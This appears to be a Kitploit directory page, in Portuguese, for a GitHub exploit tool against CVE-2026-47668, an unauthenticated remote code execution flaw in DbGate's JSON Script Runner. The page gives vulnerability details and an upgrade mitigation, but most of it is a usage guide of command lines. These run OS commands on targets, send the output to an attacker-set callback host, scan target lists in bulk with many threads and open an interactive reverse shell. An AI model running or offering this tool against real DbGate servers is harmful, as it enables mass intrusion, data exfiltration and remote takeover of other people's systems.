Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-47668 — Execução remota de código não autenticada no DbGate | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2026-47668
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubnxploited/cve-2026-47668

CVE-2026-47668

Execução remota de código não autenticada no DbGate

Ver Repositório
613há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-47668 — Execução Remota de Código no DbGate

RCE não autenticada no DbGate JSON Script Runner (dbgate-serve ≤ 7.1.8).
Ferramenta de avaliação: CVE-2026-47668.py — apenas para testes autorizados.

CVECVE-2026-47668
GravidadeCrítica
ProdutoDbGate / dbgate-serve
Afetado≤ 7.1.8
Corrigido≥ 7.1.9
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWECWE-20, CWE-94, CWE-1188

Vulnerabilidade

Título: Execução Remota de Código não Autenticada no DbGate via JSON Script Runner

Campos controlados pelo usuário (functionName, variableName) são incorporados em JavaScript gerado dinamicamente sem validação adequada. Um atacante pode executar código arbitrário no processo filho do runner Node.js.

ItemDetalhe
EndpointPOST /runners/start
AutenticaçãoBearer necessário; token pode ser obtido via POST /auth/login em implantações anônimas/padrão
InjeçãofunctionName, variableName em comandos assign do JSON
ImpactoExecução de comandos do SO como o usuário do processo DbGate

Mitigação: Atualize para 7.1.9+. Restrinja o acesso à rede, desabilite autenticação anônima, altere credenciais, revise logs para atividade suspeita em /runners/start.


Contato

Telegram: @KNxploited


Visão Geral da Ferramenta

CVE-2026-47668.py verifica e valida exploração contra instâncias DbGate que você está autorizado a testar.

Modos

ModoReverse shellDescrição
AUTONãoUm prompt; token + callback HTTP + padrões
CLIOpcionalControle total via flags
MassNãoEscaneie a partir de targets.txt
--reverse-shellSimVerificação TCP opcional (apenas alvo único)

Resultados

ResultadoSignificado
FALHAInalcançável, falha de autenticação ou não vulnerável
VULNRunner aceitou apenas o probe
DISPATCHPayload enviado; nenhuma saída confirmada
EXFILCallback recebido — saída de comando confirmada
REVSHTCP reverso conectado (apenas modo opcional)

Diretório de saída: Nx/ (vuln, dispatch, exfil, failed, list_report, arquivos por alvo em exfil/)


Instalação

pip install -r requirements.txt

Requer: Python 3.9+, aiohttp, colorama


Uso

Assistente AUTO (padrão — sem reverse shell)

python CVE-2026-47668.py
Entrada no promptExemplo
URL únicahttp://192.168.1.10:3000
URL + comandohttp://192.168.1.10:3000|id
Lista de alvostargets.txt

CLI — ativar flag

Cada execução CLI deve incluir --cli.

python CVE-2026-47668.py --cli [options]

Alvo único

-u / --url — URL base do alvo

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000

--cmd / --command — comando shell (padrão: id)

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "id"
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "uname -a"
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "ls -la /tmp"

--check-only — apenas probe de vulnerabilidade (sem comando)

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --check-only

--vector — vetor de injeção: functionName | variableName | both

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --vector both --cmd id

--port — porta padrão quando a URL não tem porta (padrão: 3000)

python CVE-2026-47668.py --cli -u http://192.168.1.10 --port 3000 --cmd id

--token — use token Bearer existente

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --token "eyJhbGciOi..." --cmd id

--login-json — corpo de login personalizado (padrão: {"amoid":"none"})

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --login-json "{\"amoid\":\"none\"}" --cmd id

--timeout — timeout HTTP em segundos

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --timeout 20 --cmd id

--secure — verificar certificados TLS

python CVE-2026-47668.py --cli -u https://dbgate.example.com:3000 --secure --cmd id

Callback / exfil (padrão no CLI com --cmd)

--callback-host — IP/hostname que o alvo usa para alcançar seu listener

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --callback-host 192.168.1.5 --cmd id

--listen-host — bind local para listener HTTP (padrão: 0.0.0.0)

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-host 0.0.0.0 --cmd id

--listen-port — porta HTTP exfil (padrão: 8888)

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-port 8888 --cmd id

-c / --callback — URL de callback externa (desabilita listener interno)

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 -c http://192.168.1.5:9999/ --cmd id

--wait-exfil — segundos para aguardar callback (alvo único, padrão: 8)

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --wait-exfil 15 --cmd id

--no-b64 — enviar saída sem codificação base64

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --no-b64 --cmd id

--async-exec — exec assíncrono em vez de execSync

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --async-exec --cmd id

Varredura em massa (sem reverse shell)

-f / --file — arquivo de lista de alvos

python CVE-2026-47668.py --cli -f targets.txt --cmd id

-t / --threads — workers concorrentes (padrão: 30)

python CVE-2026-47668.py --cli -f targets.txt --cmd id -t 50

--mass-wait-exfil — espera de callback por alvo em massa (padrão: 8)

python CVE-2026-47668.py --cli -f targets.txt --cmd id --mass-wait-exfil 12

Massa + porta padrão personalizada

python CVE-2026-47668.py --cli -f targets.txt --port 3000 --cmd "id"

Reverse shell (opcional — apenas alvo único)

Não é necessário para testes normais. Use HTTP exfil (--cmd) para comprovação.

--reverse-shell — alvo se conecta a LHOST:LPORT (omitir valor = IP LAN + porta 4444)

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444

--revsh-port — porta quando --reverse-shell não tem :porta

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5 --revsh-port 4444

--revsh-bind — endereço de escuta local

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-bind 0.0.0.0

--wait-revsh — aguardar TCP (padrão: 15)

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --wait-revsh 20

--revsh-interactive — relay básico stdin/stdout após conexão

python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-interactive

Nota Docker: use um IP alcançável do container DbGate (ex: gateway do host), não apenas 127.0.0.1 no seu PC.


Lista de alvos (targets.txt)

# comment
192.168.1.10
192.168.1.11:3000
http://10.0.0.8:3000
http://10.0.0.9|uname -a
https://dbgate.local|id
  • Sem porta → 3000 aplicado automaticamente
  • host|command → substituição de comando por linha
  • Relatório: Nx/list_report.txt

Arquivos de saída

Baixar ferramenta